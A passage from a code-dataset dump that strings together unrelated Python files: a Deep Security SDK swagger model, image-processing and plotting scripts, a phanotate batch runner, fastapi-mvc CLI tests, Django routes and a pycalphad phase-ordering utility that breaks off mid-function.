noqa: F401,E501\r\n\r\n\r\nclass HostedServiceRights(object):\r\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\r\n\r\n Do not edit the class manually.\r\n \"\"\"\r\n\r\n \"\"\"\r\n Attributes:\r\n swagger_types (dict): The key is attribute name\r\n and the value is attribute type.\r\n attribute_map (dict): The key is attribute name\r\n and the value is json key in definition.\r\n \"\"\"\r\n swagger_types = {\r\n 'account_rights': 'AccountRights',\r\n 'fix_rights': 'FixRights',\r\n 'heap_rights': 'HeapRights',\r\n 'license_rate_rights': 'LicenseRateRights',\r\n 'query_rights': 'QueryRights',\r\n 'query_traceback_rights': 'QueryTracebackRights',\r\n 'server_log_rights': 'ServerLogRights',\r\n 'stack_trace_rights': 'StackTraceRights',\r\n 'network_security_rights': 'NetworkSecurityRights'\r\n }\r\n\r\n attribute_map = {\r\n 'account_rights': 'accountRights',\r\n 'fix_rights': 'fixRights',\r\n 'heap_rights': 'heapRights',\r\n 'license_rate_rights': 'licenseRateRights',\r\n 'query_rights': 'queryRights',\r\n 'query_traceback_rights': 'queryTracebackRights',\r\n 'server_log_rights': 'serverLogRights',\r\n 'stack_trace_rights': 'stackTraceRights',\r\n 'network_security_rights': 'networkSecurityRights'\r\n }\r\n\r\n def __init__(self, account_rights=None, fix_rights=None, heap_rights=None, license_rate_rights=None, query_rights=None, query_traceback_rights=None, server_log_rights=None, stack_trace_rights=None, network_security_rights=None): # noqa: E501\r\n \"\"\"HostedServiceRights - a model defined in Swagger\"\"\" # noqa: E501\r\n\r\n self._account_rights = None\r\n self._fix_rights = None\r\n self._heap_rights = None\r\n self._license_rate_rights = None\r\n self._query_rights = None\r\n self._query_traceback_rights = None\r\n self._server_log_rights = None\r\n self._stack_trace_rights = None\r\n self._network_security_rights = None\r\n self.discriminator = None\r\n\r\n if account_rights is not None:\r\n self.account_rights = account_rights\r\n if fix_rights is not None:\r\n self.fix_rights = fix_rights\r\n if heap_rights is not None:\r\n self.heap_rights = heap_rights\r\n if license_rate_rights is not None:\r\n self.license_rate_rights = license_rate_rights\r\n if query_rights is not None:\r\n self.query_rights = query_rights\r\n if query_traceback_rights is not None:\r\n 
self.query_traceback_rights = query_traceback_rights\r\n if server_log_rights is not None:\r\n self.server_log_rights = server_log_rights\r\n if stack_trace_rights is not None:\r\n self.stack_trace_rights = stack_trace_rights\r\n if network_security_rights is not None:\r\n self.network_security_rights = network_security_rights\r\n\r\n @property\r\n def account_rights(self):\r\n \"\"\"Gets the account_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to accounts. # noqa: E501\r\n\r\n :return: The account_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: AccountRights\r\n \"\"\"\r\n return self._account_rights\r\n\r\n @account_rights.setter\r\n def account_rights(self, account_rights):\r\n \"\"\"Sets the account_rights of this HostedServiceRights.\r\n\r\n Rights related to accounts. # noqa: E501\r\n\r\n :param account_rights: The account_rights of this HostedServiceRights. # noqa: E501\r\n :type: AccountRights\r\n \"\"\"\r\n\r\n self._account_rights = account_rights\r\n\r\n @property\r\n def fix_rights(self):\r\n \"\"\"Gets the fix_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to fixes. # noqa: E501\r\n\r\n :return: The fix_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: FixRights\r\n \"\"\"\r\n return self._fix_rights\r\n\r\n @fix_rights.setter\r\n def fix_rights(self, fix_rights):\r\n \"\"\"Sets the fix_rights of this HostedServiceRights.\r\n\r\n Rights related to fixes. # noqa: E501\r\n\r\n :param fix_rights: The fix_rights of this HostedServiceRights. # noqa: E501\r\n :type: FixRights\r\n \"\"\"\r\n\r\n self._fix_rights = fix_rights\r\n\r\n @property\r\n def heap_rights(self):\r\n \"\"\"Gets the heap_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to the heap. # noqa: E501\r\n\r\n :return: The heap_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: HeapRights\r\n \"\"\"\r\n return self._heap_rights\r\n\r\n @heap_rights.setter\r\n def heap_rights(self, heap_rights):\r\n \"\"\"Sets the heap_rights of this HostedServiceRights.\r\n\r\n Rights related to the heap. # noqa: E501\r\n\r\n :param heap_rights: The heap_rights of this HostedServiceRights. # noqa: E501\r\n :type: HeapRights\r\n \"\"\"\r\n\r\n self._heap_rights = heap_rights\r\n\r\n @property\r\n def license_rate_rights(self):\r\n \"\"\"Gets the license_rate_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to license rates. # noqa: E501\r\n\r\n :return: The license_rate_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: LicenseRateRights\r\n \"\"\"\r\n return self._license_rate_rights\r\n\r\n @license_rate_rights.setter\r\n def license_rate_rights(self, license_rate_rights):\r\n \"\"\"Sets the license_rate_rights of this HostedServiceRights.\r\n\r\n Rights related to license rates. # noqa: E501\r\n\r\n :param license_rate_rights: The license_rate_rights of this HostedServiceRights. # noqa: E501\r\n :type: LicenseRateRights\r\n \"\"\"\r\n\r\n self._license_rate_rights = license_rate_rights\r\n\r\n @property\r\n def query_rights(self):\r\n \"\"\"Gets the query_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to queries. # noqa: E501\r\n\r\n :return: The query_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: QueryRights\r\n \"\"\"\r\n return self._query_rights\r\n\r\n @query_rights.setter\r\n def query_rights(self, query_rights):\r\n \"\"\"Sets the query_rights of this HostedServiceRights.\r\n\r\n Rights related to queries. 
# noqa: E501\r\n\r\n :param query_rights: The query_rights of this HostedServiceRights. # noqa: E501\r\n :type: QueryRights\r\n \"\"\"\r\n\r\n self._query_rights = query_rights\r\n\r\n @property\r\n def query_traceback_rights(self):\r\n \"\"\"Gets the query_traceback_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to query traceback. # noqa: E501\r\n\r\n :return: The query_traceback_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: QueryTracebackRights\r\n \"\"\"\r\n return self._query_traceback_rights\r\n\r\n @query_traceback_rights.setter\r\n def query_traceback_rights(self, query_traceback_rights):\r\n \"\"\"Sets the query_traceback_rights of this HostedServiceRights.\r\n\r\n Rights related to query traceback. # noqa: E501\r\n\r\n :param query_traceback_rights: The query_traceback_rights of this HostedServiceRights. # noqa: E501\r\n :type: QueryTracebackRights\r\n \"\"\"\r\n\r\n self._query_traceback_rights = query_traceback_rights\r\n\r\n @property\r\n def server_log_rights(self):\r\n \"\"\"Gets the server_log_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to server logs. # noqa: E501\r\n\r\n :return: The server_log_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: ServerLogRights\r\n \"\"\"\r\n return self._server_log_rights\r\n\r\n @server_log_rights.setter\r\n def server_log_rights(self, server_log_rights):\r\n \"\"\"Sets the server_log_rights of this HostedServiceRights.\r\n\r\n Rights related to server logs. # noqa: E501\r\n\r\n :param server_log_rights: The server_log_rights of this HostedServiceRights. # noqa: E501\r\n :type: ServerLogRights\r\n \"\"\"\r\n\r\n self._server_log_rights = server_log_rights\r\n\r\n @property\r\n def stack_trace_rights(self):\r\n \"\"\"Gets the stack_trace_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to stack traces. # noqa: E501\r\n\r\n :return: The stack_trace_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: StackTraceRights\r\n \"\"\"\r\n return self._stack_trace_rights\r\n\r\n @stack_trace_rights.setter\r\n def stack_trace_rights(self, stack_trace_rights):\r\n \"\"\"Sets the stack_trace_rights of this HostedServiceRights.\r\n\r\n Rights related to stack traces. # noqa: E501\r\n\r\n :param stack_trace_rights: The stack_trace_rights of this HostedServiceRights. # noqa: E501\r\n :type: StackTraceRights\r\n \"\"\"\r\n\r\n self._stack_trace_rights = stack_trace_rights\r\n\r\n @property\r\n def network_security_rights(self):\r\n \"\"\"Gets the network_security_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to Network Security. # noqa: E501\r\n\r\n :return: The network_security_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: NetworkSecurityRights\r\n \"\"\"\r\n return self._network_security_rights\r\n\r\n @network_security_rights.setter\r\n def network_security_rights(self, network_security_rights):\r\n \"\"\"Sets the network_security_rights of this HostedServiceRights.\r\n\r\n Rights related to Network Security. # noqa: E501\r\n\r\n :param network_security_rights: The network_security_rights of this HostedServiceRights. 
# noqa: E501\r\n :type: NetworkSecurityRights\r\n \"\"\"\r\n\r\n self._network_security_rights = network_security_rights\r\n\r\n def to_dict(self):\r\n \"\"\"Returns the model properties as a dict\"\"\"\r\n result = {}\r\n\r\n for attr, _ in six.iteritems(self.swagger_types):\r\n value = getattr(self, attr)\r\n if isinstance(value, list):\r\n result[attr] = list(map(\r\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\r\n value\r\n ))\r\n elif hasattr(value, \"to_dict\"):\r\n result[attr] = value.to_dict()\r\n elif isinstance(value, dict):\r\n result[attr] = dict(map(\r\n lambda item: (item[0], item[1].to_dict())\r\n if hasattr(item[1], \"to_dict\") else item,\r\n value.items()\r\n ))\r\n else:\r\n result[attr] = value\r\n if issubclass(HostedServiceRights, dict):\r\n for key, value in self.items():\r\n result[key] = value\r\n\r\n return result\r\n\r\n def to_str(self):\r\n \"\"\"Returns the string representation of the model\"\"\"\r\n return pprint.pformat(self.to_dict())\r\n\r\n def __repr__(self):\r\n \"\"\"For `print` and `pprint`\"\"\"\r\n return self.to_str()\r\n\r\n def __eq__(self, other):\r\n \"\"\"Returns true if both objects are equal\"\"\"\r\n if not isinstance(other, HostedServiceRights):\r\n return False\r\n\r\n return self.__dict__ == other.__dict__\r\n\r\n def __ne__(self, other):\r\n \"\"\"Returns true if both objects are not equal\"\"\"\r\n return not self == other\r\n\r\n","repo_name":"DeepSecurityHealthCheck/HealthCheckCore","sub_path":"vendor/SDK/deepsecurity/models/hosted_service_rights.py","file_name":"hosted_service_rights.py","file_ext":"py","file_size_in_byte":12685,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"17653042890","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, unicode_literals\n\nfrom collections import namedtuple\n\n\nPolymorphicClassInfo = namedtuple('PolymorphicClassInfo', [\n 'model',\n 'fields',\n])\n\n\ndef get_subclasses(cls):\n \"\"\"\n Recursively creates a list of all subclasses of the provided class.\n \"\"\"\n return cls.__subclasses__() + [sub\n for direct in cls.__subclasses__()\n for sub in get_subclasses(direct)]\n\n\ndef get_polymorphic_field_mapping(cls):\n \"\"\"\n Creates several helper attributes on the serializer and builds a\n mapping of subclasses to the fields included on each.\n \"\"\"\n return {\n subclass.__name__: PolymorphicClassInfo(\n model=subclass,\n fields=[field for field in subclass._meta.local_fields\n if field.serialize and not field.rel])\n for subclass in get_subclasses(cls) + [cls]\n }\n","repo_name":"emergence-lab/emergence-lab","sub_path":"core/polymorphic.py","file_name":"polymorphic.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"10859765347","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n# give us 100 2d values centered at 0\n# X = np.random.randn(100, 2)\n#\n# plt.scatter(X[:,0], X[:,1])\n# plt.show()\n\nX = np.random.randn(200, 2)\n# create clusters of data\n# select all the rows from index 0 to index 50 and add a 3 to all elements\nX[:50] += 3\n\n# this is a 1d array that colors the particular clusters\nY = np.zeros(200)\nY[:50] = 1\n\nplt.scatter(X[:,0], X[:,1], 
c=Y)\nplt.show()","repo_name":"PikePullen/matplotlib2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33333787367","text":"import cv2 as cv\nimport numpy as np\n\nimg1 = cv.imread(\"imagenes/img1.jpg\")\nimg2 = cv.imread(\"imagenes/img2.png\")\ncv.imwrite(\"Resultados/Original_Universe.png\", img1)\ncv.imwrite(\"Resultados/Original_Thanos.png\", img2)\n\n\n#####################################################################\ndef rescale(image, scale=0.5):\n width = int(image.shape[1]*scale)\n height = int(image.shape[0]*scale)\n dimensions = (width, height)\n\n return cv.resize(image, dimensions, interpolation=cv.INTER_AREA)\n\nimg1_rescale = rescale(img1)\nimg2_rescale = rescale(img2)\ncv.imwrite(\"Resultados/Rescaled_Universe.png\",img1_rescale)\ncv.imwrite(\"Resultados/Rescaled_Thanos.png\",img2_rescale)\n\n####################################################################\n\ndef draws1 (image1):\n \n cv.rectangle(image1, (500, 100), (50, 20), (43, 54, 165), thickness=2)\n cv.circle(image1, (530, 60), 50, (255, 64, 255), thickness=-1)\n cv.circle(image1, (500, 200), 80, (112, 10, 30), thickness=2)\n cv.circle(image1, (100, 200), 100, (64, 87, 130), thickness=-1)\n cv.line(image1,(200,0),(600,200),(0,255,0),thickness=10)\n cv.putText(image1, \"This is magnificent\", (100, 200), cv.FONT_HERSHEY_TRIPLEX, 1, (255, 255, 255), 2)\n \n return(image1)\n\ndef draws2(image2):\n cv.rectangle(image2, (500, 540), (200, 400), (43, 54, 165), thickness=cv.FILLED)\n cv.circle(image2, (530, 60), 50, (120, 280, 30), thickness=-1)\n cv.circle(image2, (310, 110), 100, (12, 210, 30), thickness=2)\n cv.circle(image2, (100, 200), 100, (120, 80, 130), thickness=-1)\n cv.line(image2,(600,0),(0,600),(255,255,0),thickness=10)\n cv.putText(image2, \"I AM INEVIBALE\", (230, 480), cv.FONT_HERSHEY_DUPLEX, 1, (255, 255, 255), 2)\n\n \n return(image2)\n\ndraw11 = draws1(img1)\ndraw12 = draws2(img2)\ncv.imwrite(\"Resultados/Draw_Universe.png\", draw11 )\ncv.imwrite(\"Resultados/Draw_Thanos.png\", draw12)\n\n\n####################################################################\ndef ColorScale(image):\n con = cv.cvtColor(image, cv.COLOR_BGR2RGB)\n return(con) \n\ndef grayScale(image):\n con = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\n return(con)\n\ncon_uni = ColorScale(img1)\ncon_tha = ColorScale(img2)\ngray_uni = grayScale(img1)\ngray_tha = grayScale(img2)\n\ncv.imwrite(\"Resultados/Inverted_Universe.png\", con_uni)\ncv.imwrite(\"Resultados/Iverted_Thanos.png\", con_tha)\ncv.imwrite(\"Resultados/Gray_Universe.png\", gray_uni)\ncv.imwrite(\"Resultados/Gray_Thanos.png\", gray_tha)\n######################################################################\n\n#recro = cv.rectangle(img1, (575, 320), (477, 220), (0,0,255), thickness=2)\ndef croped1():\n UniCro = img1[220:320, 477:575]\n return(UniCro)\n\n#recro = cv.rectangle(img2, (230, 10), (400, 225), (0, 0, 255), thickness=2)\ndef croped2():\n ThaCro = img2[10:225, 230:400]\n return(ThaCro)\n\nCropUni =croped1() \nCropTha =croped2()\n\ncv.imwrite(\"Resultados/Croped_Star.png\", CropUni)\ncv.imwrite(\"Resultados/Croped_Thanos.png\", CropTha)\n######################################################################\ndef th(img):\n ret, thresh = cv.threshold(img, 110, 255, cv.THRESH_BINARY)\n return(thresh)\n\nthresh_uni= th(gray_uni)\nthresh_tha = th(gray_tha)\n\ncv.imwrite(\"Resultados/Thresh_Thanos.png\", 
thresh_tha)\ncv.imwrite(\"Resultados/Thresh_Universe.png\", thresh_uni)\n\n#######################################################################\ndef mask(image):\n blank = np.zeros(image.shape[:2], dtype = \"uint8\")\n circle = cv.circle(blank, (image.shape[1]//2,image.shape[0]//2),100,255, -1)\n masked = cv.bitwise_and(image,image,mask=circle)\n return(masked)\n\nmasked_uni = mask(img1)\nmasked_Thanos = mask(img2)\ncv.imwrite(\"Resultados/Masked_Uni.png\", masked_uni)\ncv.imwrite(\"Resultados/Masked_Thanos.png\", masked_Thanos)\n\n########################################################################\n\n\n","repo_name":"NestorMartinez13/Taller_3_Python_UPB_2022_1003043733","sub_path":"transformations.py","file_name":"transformations.py","file_ext":"py","file_size_in_byte":3828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6263588374","text":"#!/usr/bin/env python3\n\"\"\"\nPhanotate runner.\nUsage:\n phanotate_runner.py ( --input_file_list=PATH ) ( --output_dir=PATH )\n ( --out_format=FORMAT ) ( --threads=INT )\n\nOptions:\n -h --help Show this screen.\n -i --input_file_list=PATH Path to a file containing a list of input fasta files.\n -o --output_dir=PATH Path to the output directory.\n -f --out_format=FORMAT Format of the output files choices=['tabular','genbank','fasta'] [default: genbank]\n -t --threads=INT Number of threads to use for running individual anotations [default: 1].\n\"\"\"\nimport os\nimport sys\nimport subprocess\nimport logging\nfrom multiprocessing import Pool\nfrom functools import partial\nfrom docopt import docopt\nlogger = logging.getLogger(__name__)\n\n\ndef check_extensions(input_file):\n extensions = ('.fasta', 'fasta.gz', '.fa', '.fa.gz', '.fna', '.fna.gz')\n for ext in extensions:\n if input_file.endswith(ext):\n return ext\n raise ValueError(\"Input file does not have a valid extension: {}\\nValid extensions are: {}\".format(input_file, extensions))\n\ndef run_phanotate(input_file, output_dir, out_format, input_file_extension='', output_file_extension='',):\n \"\"\"\n Run phanotate on a single input file.\n \"\"\"\n out_fname = os.path.join(output_dir, os.path.basename(input_file).replace(input_file_extension, output_file_extension))\n try:\n cmd = [\n 'phanotate.py',\n '-o', out_fname,\n '-f', out_format,\n input_file ]\n logger.info(\"Running phanotate on {}\".format(input_file))\n logger.info(\"Running command: {}\".format(' '.join(cmd)))\n subprocess.run(cmd, check=True)\n except subprocess.CalledProcessError:\n logger.error(\"Error running phanotate on {}\".format(input_file))\n sys.exit(1)\n\ndef main(*args, **kwargs):\n logging.basicConfig(\n level = logging.INFO,\n datefmt=\"%Y-%m-%d %H:%M\",\n format=\"[%(name)s][%(asctime)s][%(levelname)s] %(message)s\",\n handlers=[\n logging.StreamHandler(),\n ]\n )\n logger.info(\"Arguments: {}\".format(kwargs))\n\n assert int(kwargs['--threads']) > 0, \"Number of threads must be greater than 0\"\n\n kwargs['--output_dir'] = os.path.abspath(kwargs['--output_dir'])\n assert os.path.isdir(kwargs['--output_dir']), \"Output directory does not exist: {}\".format(kwargs['--output_dir'])\n\n file_extensions = {'tabular': '.tsv', 'genbank': '.gbk', 'fasta': '.fna'}\n assert kwargs['--out_format'] in file_extensions.keys(), \"Output format must be one of: {}\".format(file_extensions.keys())\n\n with open(kwargs['--input_file_list'], 'r') as f:\n input_files = f.read().splitlines()\n\n for input_file in input_files:\n assert os.path.exists(input_file), 
\"Input file does not exist: {}\".format(input_file)\n\n logger.info(\"Running phanotate on {} files\".format(len(input_files)))\n\n logger.info(\"Starting phanotate annotations with {} threads\".format(kwargs['--threads']))\n with Pool(int(kwargs['--threads'])) as p:\n p.map(\n partial(\n run_phanotate,\n output_dir=kwargs['--output_dir'],\n out_format=kwargs['--out_format'],\n input_file_extension=check_extensions(input_files[0]),\n output_file_extension=file_extensions[kwargs['--out_format']],\n ),\n input_files)\n\n logger.info(\"FINISHED !\")\n\nif __name__ == '__main__':\n main(**docopt(__doc__))\n","repo_name":"pangenome/phage-evo-paper","sub_path":"workflow/scripts/phanotate_runner.py","file_name":"phanotate_runner.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"26288370638","text":"from collections import Counter\n\nf = open(\"msgs.txt\",\"r\")\nmsgs=[]\nfor msg in f.readlines():\n\tmsgs.append(msg[-5:-1])\n\ncntrs = Counter(msgs)\nfreqs = Counter(cntrs.values())\n\nfor cntr in cntrs:\n\tprint(cntr, cntrs[cntr])\nprint(freqs, \"sum:\", sum(cntrs.values()))\n","repo_name":"amjadmajid/Backscatter-Network","sub_path":"sniffer/frame_stats.py","file_name":"frame_stats.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40390332495","text":"from django.contrib import admin\nfrom django.urls import path,include\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"ShopHome\"),\n path(\"contact_us/\", views.contact_us, name=\"Contact us\"),\n path(\"about_us/\", views.about_us, name=\"about_us\"),\n path(\"tracker/\", views.tracker, name=\"tracker\"),\n path(\"prod_view/\", views.prod_view, name=\"prod_view\"),\n path(\"search/\", views.search, name=\"search\"),\n path(\"checkout/\", views.checkout, name=\"checkout\"),\n path(\"handlerequest/\", views.handlerequest, name=\"HandleRequest\"),\n]\n","repo_name":"Fahad-CSE16/EcommerseWeb","sub_path":"shop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37183128943","text":"import copy\nfrom unittest import mock\n\nimport pytest\nfrom copier.errors import UserMessageError\nfrom fastapi_mvc.cli.update import update\nfrom fastapi_mvc.constants import ANSWERS_FILE, COPIER_PROJECT\n\n\nclass TestCliUpdateCommand:\n\n @pytest.fixture\n def patched_update(self):\n cmd = copy.deepcopy(update)\n copier_patch = mock.patch(\n \"fastapi_mvc.cli.update.copier\",\n )\n cmd.copier = copier_patch.start()\n yield cmd\n copier_patch.stop()\n del cmd\n\n def test_should_exit_zero_when_invoked_with_help(self, monkeypatch, fake_project, cli_runner):\n # given / when\n monkeypatch.chdir(fake_project[\"root\"])\n result = cli_runner.invoke(update, [\"--help\"])\n\n # then\n assert result.exit_code == 0\n\n def test_should_exit_error_when_invoked_with_invalid_option(self, cli_runner):\n # given / when\n result = cli_runner.invoke(update, [\"--not_exists\"])\n\n # then\n assert result.exit_code == 2\n\n def test_should_exit_zero_and_call_copier_with_defaults(self, patched_update, monkeypatch, fake_project, cli_runner):\n # given / when\n monkeypatch.chdir(fake_project[\"root\"])\n result = cli_runner.invoke(patched_update, [])\n\n # then\n assert result.exit_code == 0\n 
patched_update.copier.run_update.assert_called_once_with(\n vcs_ref=COPIER_PROJECT.vcs_ref,\n answers_file=ANSWERS_FILE,\n user_defaults={\n \"_commit\": \"efb938e\",\n \"_src_path\": \"https://github.com/fastapi-mvc/copier-project.git\",\n \"aiohttp\": True,\n \"author\": \"Radosław Szamszur\",\n \"chart_name\": \"fake-project\",\n \"container_image_name\": \"fake-project\",\n \"copyright_date\": \"2022\",\n \"email\": \"github@rsd.sh\",\n \"fastapi_mvc_version\": \"0.17.0\",\n \"github_actions\": True,\n \"helm\": True,\n \"license\": \"MIT\",\n \"nix\": True,\n \"package_name\": \"fake_project\",\n \"project_description\": \"This project was generated with fastapi-mvc.\",\n \"project_name\": \"fake-project\",\n \"redis\": True,\n \"repo_url\": \"https://your.repo.url.here\",\n \"script_name\": \"fake-project\",\n \"version\": \"0.1.0\",\n },\n pretend=False\n )\n\n def test_should_exit_zero_and_call_copier_with_parsed_arguments(self, patched_update, monkeypatch, fake_project, cli_runner):\n # given / when\n monkeypatch.chdir(fake_project[\"root\"])\n result = cli_runner.invoke(\n patched_update, [\n \"--no-interaction\",\n \"--pretend\",\n \"--use-version\",\n \"master\",\n ],\n )\n\n # then\n assert result.exit_code == 0\n patched_update.copier.run_update.assert_called_once_with(\n vcs_ref=\"master\",\n answers_file=ANSWERS_FILE,\n data={\n \"_commit\": \"efb938e\",\n \"_src_path\": \"https://github.com/fastapi-mvc/copier-project.git\",\n \"aiohttp\": True,\n \"author\": \"Radosław Szamszur\",\n \"chart_name\": \"fake-project\",\n \"container_image_name\": \"fake-project\",\n \"copyright_date\": \"2022\",\n \"email\": \"github@rsd.sh\",\n \"fastapi_mvc_version\": \"0.17.0\",\n \"github_actions\": True,\n \"helm\": True,\n \"license\": \"MIT\",\n \"nix\": True,\n \"package_name\": \"fake_project\",\n \"project_description\": \"This project was generated with fastapi-mvc.\",\n \"project_name\": \"fake-project\",\n \"redis\": True,\n \"repo_url\": \"https://your.repo.url.here\",\n \"script_name\": \"fake-project\",\n \"version\": \"0.1.0\",\n },\n overwrite=True,\n pretend=True,\n )\n\n def test_should_exit_error_when_not_in_fastapi_mvc_project(self, cli_runner, caplog):\n # given / when\n result = cli_runner.invoke(update, [])\n\n # then\n assert result.exit_code == 1\n msg = \"Not a fastapi-mvc project. Try 'fastapi-mvc new --help' for details how to create one.\"\n assert msg in caplog.text\n\n def test_should_exit_error_on_copier_error(self, patched_update, monkeypatch, fake_project, cli_runner):\n # given / when\n patched_update.copier.run_update.side_effect = UserMessageError(\"Fake error\")\n monkeypatch.chdir(fake_project[\"root\"])\n result = cli_runner.invoke(patched_update, [])\n\n # then\n assert result.exit_code == 2\n assert \"Fake error\" in result.output\n patched_update.copier.run_update.assert_called_once()\n","repo_name":"fastapi-mvc/fastapi-mvc","sub_path":"tests/unit/cli/test_update.py","file_name":"test_update.py","file_ext":"py","file_size_in_byte":4926,"program_lang":"python","lang":"en","doc_type":"code","stars":495,"dataset":"github-code","pt":"53"} +{"seq_id":"12352042811","text":"\"\"\"\nUtilities for distinguishing and renaming ordered and disordered configurations of\nmulti-sublattice phases.\n\n`OrderingRecord` objects are able to be used for any phase. 
`OrderingRecords` can be\ncreated automatically for phases modeled with a partitioned order/disorder model through\nthe `create_ordering_records` method, since the partitioned model contains all the\ninformation about the ordered and disordered phase.\n\"\"\"\n\nfrom dataclasses import dataclass\nfrom typing import Sequence, List\nimport itertools\nfrom collections import defaultdict\nimport numpy as np\nimport xarray as xr\nfrom pycalphad.core.utils import unpack_components\n\n@dataclass\nclass OrderingRecord:\n ordered_phase_name: str\n disordered_phase_name: str\n subl_dof: Sequence[int] # number of degrees of freedom in each sublattice of the ordered phase\n symmetric_subl_idx: Sequence[Sequence[int]] # List of sublattices (of the ordered phase) that are symmetric\n\n def is_disordered(self, site_fractions):\n # Short circuit if any site fraction is NaN (i.e. no phase or a different phase)\n if np.any(np.isnan(site_fractions[:sum(self.subl_dof)])):\n return False\n\n # For each sublattice, create a `slice` object for slicing the site\n # fractions of that particular sublattice from the site fraction array\n subl_slices = []\n for subl_idx in range(len(self.subl_dof)):\n start_idx = np.sum(self.subl_dof[:subl_idx], dtype=np.int_)\n end_idx = start_idx + self.subl_dof[subl_idx]\n subl_slices.append(slice(start_idx, end_idx))\n\n # For each set of symmetrically equivalent sublattices\n for symm_subl in self.symmetric_subl_idx:\n # Check whether the site fractions of each pair of symmetrically\n # equivalent sublattices are ordered or disordered\n for idx1, idx2 in itertools.combinations(symm_subl, 2):\n # A phase is ordered if any pair of sublattices does not have\n # equal (within numerical tolerance) site fractions\n pair_is_ordered = np.any(~np.isclose(site_fractions[subl_slices[idx1]], site_fractions[subl_slices[idx2]]))\n if pair_is_ordered:\n return False\n return True\n\n\ndef create_ordering_records(dbf, comps, phases):\n \"\"\"Return a dictionary with the sublattice degrees of freedom and equivalent\n sublattices for order/disorder phases\n\n Parameters\n ----------\n dbf : pycalphad.Database\n comps : list[str]\n List of active components to consider\n phases : list[str]\n List of active phases to consider\n\n Returns\n -------\n List[OrderingRecord]\n\n Notes\n -----\n Phases which should be checked for ordered/disordered configurations are\n determined heuristically for this script.\n\n The heuristic for a phase satisfies the following:\n 1. The phase is the ordered part of an order-disorder model\n 2. The equivalent sublattices have all the same number of elements\n \"\"\"\n species = unpack_components(dbf, comps)\n ordering_records = []\n for phase_name in phases:\n phase_obj = dbf.phases[phase_name]\n if phase_name == phase_obj.model_hints.get('ordered_phase', ''):\n # This phase is active and modeled with an order/disorder model.\n dof = [len(subl.intersection(species)) for subl in phase_obj.constituents]\n # Define the symmetrically equivalent sublattices as any sublattices\n # TODO: the heuristic here is simple and incorrect for cases like L1_2.\n # that have the same site ratio. 
Create a {site_ratio: [subl idx]} dict\n site_ratio_idxs = defaultdict(lambda: [])\n for subl_idx, site_ratio in enumerate(phase_obj.sublattices):\n site_ratio_idxs[site_ratio].append(subl_idx)\n equiv_sublattices = list(site_ratio_idxs.values())\n ordering_records.append(OrderingRecord(phase_name, phase_obj.model_hints['disordered_phase'], dof, equiv_sublattices))\n return ordering_records\n\n\ndef rename_disordered_phases(eq_result, ordering_records):\n \"\"\"\n Modify an xarray Dataset to rename the ordered phase names to the disordered phase\n names if the equilibrium configuration is disordered\n\n Parameters\n ----------\n eq_result : xarray.Dataset\n order_disorder_dict : OrderingRecord\n Output from scheil.utils.order_disorder_dict\n\n Returns\n -------\n xrray.Dataset\n Dataset modified in-place\n\n Notes\n -----\n This function does _not_ change the site fractions array of the disordered\n configurations to match the site fractions matching the internal degrees of freedom\n of the disordered phase's constituents (although that should be possible).\n\n Examples\n --------\n >>> from pycalphad import Database, equilibrium, variables as v\n >>> import pycalphad.tests.databases\n >>> from importlib_resources import files\n >>> dbf = Database(str(files(pycalphad.tests.databases).joinpath(\"alcfe_b2.tdb\")))\n >>> comps = ['AL', 'FE', 'VA']\n >>> phases = list(dbf.phases.keys())\n >>> eq_res = equilibrium(dbf, comps, ['B2_BCC'], {v.P: 101325, v.T: 1000, v.N: 1, v.X('AL'): [0.1, 0.4]})\n >>> ordering_records = create_ordering_records(dbf, comps, phases)\n >>> eq_res.Phase.values.squeeze().tolist()\n [['B2_BCC', '', ''], ['B2_BCC', '', '']]\n >>> out_result = rename_disordered_phases(eq_res, ordering_records)\n >>> eq_res.Phase.values.squeeze().tolist()\n [['A2_BCC', '', ''], ['B2_BCC', '', '']]\n \"\"\"\n\n for ord_rec in ordering_records:\n # Array indices matching phase with ordered phase name\n mask = eq_result.Phase == ord_rec.ordered_phase_name\n # disordered_mask is a boolean mask that is True if the element listed as an\n # ordered phase is a disordered configuration. We want to broadcast over all\n # dimensions except for internal_dof (we need all internal dof to determine if\n # the site fractions are disordered). 
